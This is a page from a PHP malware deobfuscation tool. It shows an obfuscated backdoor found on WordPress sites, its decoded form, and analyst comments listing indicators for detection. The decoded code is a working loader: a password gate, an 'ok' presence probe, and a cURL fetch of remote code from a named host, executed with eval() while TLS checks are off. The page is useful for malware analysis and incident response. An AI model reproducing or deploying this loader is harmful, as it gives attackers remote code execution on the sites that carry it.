
PHP deobfuscation, decryption, reconstruction tool

Deobfuscate PHP malware, viruses and injected (tampering) code found on WordPress sites back into readable code.

*Please note that not all obfuscated code can be decoded.

The code below has been decoded.

<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && h...



Obfuscated PHP code

<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php
// Analyst note: the line above turns off PHP error reporting and answers any request that has an
// "ok" parameter in $_REQUEST with a fixed string, then stops -- presumably a presence check for
// whoever planted the file.
// The statement below is an access gate: unless the session flag 'secretyt' is already true, the
// SHA-256 of POST field 'pwdyt' must match the hard-coded digest (compared with loose ==);
// otherwise a bare password form is printed and execution ends. The field name, session key and
// digest are fixed strings, so they can serve as search terms when hunting for copies of this file.
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '6e4d5228cf850d984a9159d8a6957eb2252f871ba2bdab40c199c983ea7e93d1') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
// Analyst note: goto-label obfuscation. Execution starts at label ufyJM and hops between labels,
// appending octal/hex-escaped fragments to $SS8Fu so that the finished string is a URL spelled
// backwards. At label pJ6Ea the string is reversed with strrev(), fetched by TW2kx() and the
// response body is passed to eval(). PHP function names are case-insensitive, so the TW2kx() call
// resolves to the tw2kx() definition at label Llwav, a cURL fetch with TLS peer and host
// verification both set to false.
// The second-stage code is never stored in this file: a file scan sees only this loader, so
// string signatures should target the loader shape (escaped fragments + strrev + eval + curl).
goto ufyJM; AaPQL: $SS8Fu .= "\157"; goto XxOur; gJ1dM: $SS8Fu .= "\164\56\x38\x2f"; goto BPiac; Hn59D: $SS8Fu .= "\x61"; goto dbXUc; BPiac: $SS8Fu .= "\144\154\157\57"; goto Hn59D; aqi1A: $SS8Fu .= "\57"; goto lnPzn; pYuEx: $SS8Fu .= "\x74\170"; goto gJ1dM; ufyJM: $SS8Fu = ''; goto pYuEx; h0m9f: $SS8Fu .= "\141\x6d\x61\x64\x2f"; goto aqi1A; pJ6Ea: eval("\77\76" . TW2kx(strrev($SS8Fu))); goto Llwav; dbXUc: $SS8Fu .= "\155\x61\144\57\x70"; goto AaPQL; EDDpp: $SS8Fu .= "\x2e\x31\x30"; goto h0m9f; Vt2Z2: $SS8Fu .= "\150"; goto pJ6Ea; XxOur: $SS8Fu .= "\x74"; goto EDDpp; lnPzn: $SS8Fu .= "\72\163\160\x74\164"; goto Vt2Z2; Llwav: function tw2kx($V1_rw = '') { goto GAPWw; laz_R: curl_close($xM315); goto IoTv3; HSzma: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto iCv9F; GAPWw: $xM315 = curl_init(); goto ztSlD; iCv9F: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto iefx0; fLEdf: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto Un6kY; ztSlD: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto fLEdf; IoTv3: return $tvmad; goto GP0kC; Un6kY: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto HSzma; iefx0: $tvmad = curl_exec($xM315); goto laz_R; GP0kC: }

Decoded (deobfuscated) PHP code

<?php

// Stage 0 of the implant: hide errors, answer presence checks, then gate everything behind a password.

// Turn off PHP error reporting for the rest of the request.
error_reporting(0);
// A request with an "ok" parameter in $_REQUEST gets a fixed reply and nothing else runs --
// presumably a presence check for the operator. Requests carrying that parameter to an
// unexpected PHP file are worth searching for in web access logs.
if (isset($_REQUEST["ok"])) {
    die(">ok<");
}
// Password gate. Skipped entirely if session_start() is unavailable, in which case the code
// after this block runs for every request.
if (function_exists('session_start')) {
    session_start();
    // 'secretyt' is the "authenticated" flag kept in the PHP session; it defaults to false.
    if (!isset($_SESSION['secretyt'])) {
        $_SESSION['secretyt'] = false;
    }
    if (!$_SESSION['secretyt']) {
        // The SHA-256 of POST field 'pwdyt' is compared (loose ==) with a digest hard-coded in
        // the file. The digest, the field name and the session key are constant strings and can
        // be used as indicators when searching a site or a backup for this implant.
        if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '6e4d5228cf850d984a9159d8a6957eb2252f871ba2bdab40c199c983ea7e93d1') {
            $_SESSION['secretyt'] = true;
        } else {
            // Unauthenticated visitors only ever see this bare password form; die() stops the
            // request before the remote fetch below is reached.
            die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>');
        }
    }
}
// Stage 1: reconstruct the download URL and execute whatever the remote host returns.
// NOTE(review): the obfuscated listing on this page appends with ".=" at every step; the decoder
// prints the accumulated value of $SS8Fu after each append as a plain "=" assignment, so the
// lines below are a trace of the string being built, not thirteen independent assignments.
// The string is the URL written backwards, which keeps "https://" and the host name out of
// simple string searches over the file.
$SS8Fu = '';
$SS8Fu = "tx";
$SS8Fu = "txt.8/";
$SS8Fu = "txt.8/dlo/";
$SS8Fu = "txt.8/dlo/a";
$SS8Fu = "txt.8/dlo/amad/p";
$SS8Fu = "txt.8/dlo/amad/po";
$SS8Fu = "txt.8/dlo/amad/pot";
$SS8Fu = "txt.8/dlo/amad/pot.10";
$SS8Fu = "txt.8/dlo/amad/pot.10amad/";
$SS8Fu = "txt.8/dlo/amad/pot.10amad//";
$SS8Fu = "txt.8/dlo/amad/pot.10amad//:sptt";
$SS8Fu = "txt.8/dlo/amad/pot.10amad//:sptth";
// The decoder has already applied strrev() and shows the resulting URL as a literal. The response
// body is prefixed with a PHP closing tag and handed to eval(), so the remote text is treated
// like the contents of a PHP file: the second stage lives only on the remote host and can change
// between requests without this file changing. For responders: the host in this URL is a
// network indicator (outbound HTTPS from the web server), and cleaning up this loader alone does
// not show what the fetched code did while it was reachable.
// TW2kx() resolves to tw2kx() below because PHP function names are case-insensitive.
eval("?>" . TW2kx("https://dama01.top/dama/old/8.txt"));
/**
 * Download helper used by the loader: fetches a URL with cURL and returns the response body.
 *
 * Analyst notes: TLS certificate and host-name checks are both set to false, so the fetch
 * proceeds whatever certificate the remote end presents. The function depends on the PHP cURL
 * extension (curl_init, curl_setopt, curl_exec, curl_close); NOTE(review): restricting outbound
 * connections from the web server or the cURL functions would presumably stop this fetch --
 * confirm against the site's legitimate needs before relying on it.
 *
 * @param string $V1_rw URL to request (the caller passes the reconstructed download URL).
 * @return string|bool Response body as a string; false when curl_exec() fails, which the caller
 *                     concatenates and evaluates without checking.
 */
function tw2kx($V1_rw = '')
{
    $xM315 = curl_init();
    // Return the body as a string instead of echoing it, so the caller can pass it to eval().
    curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true);
    // Allow the transfer up to 500 seconds before giving up.
    curl_setopt($xM315, CURLOPT_TIMEOUT, 500);
    // Certificate verification off...
    curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false);
    // ...and host-name verification off as well.
    curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($xM315, CURLOPT_URL, $V1_rw);
    $tvmad = curl_exec($xM315);
    curl_close($xM315);
    return $tvmad;
}

